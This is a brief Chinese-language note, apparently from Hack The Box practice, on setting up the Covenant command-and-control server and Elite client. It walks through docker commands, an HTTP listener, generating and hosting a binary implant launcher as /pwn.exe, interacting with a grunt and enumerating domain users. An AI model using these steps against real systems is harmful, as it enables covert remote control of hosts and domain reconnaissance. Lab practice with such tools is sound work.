新出现的cc框架,之前看hack the box有人用过,不过还是用cs比较多,
这里把之前的笔记搬运过来
---
设置covenant
git clone --recurse-submodules https://github.com/cobbr/Covenant
cd Covenant/Covenant
docker build -t covenant .
docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant -v `pwd`/Data:/app/Data covenant --username AdminUser --computername 0.0.0.0
设置elite
git clone --recurse-submodules https://github.com/cobbr/Elite
cd Elite/Elite
docker build -t elite .
docker run -it --rm --name elite -v `pwd`/Data:/app/Data elite --username AdminUser --computername 10.10.16.2
启动covenant 和elite
docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant -v `pwd`/Data:/app/Data covenant --username AdminUser --computername 0.0.0.0
docker run -it --rm --name elite -v `pwd`/Data:/app/Data elite --username AdminUser --computername 10.10.16.3
设置listener
Listeners
HTTP
Set ConnectAddress 10.10.16.3
start
back
rename xxxx name
show
创建launcher并host
back
Launchers
binary
set listenername sizzle
generate
host /pwn.exe
与grunt交互
back
back
Grunts
Interact <id>
枚举域用户
GetDomainUser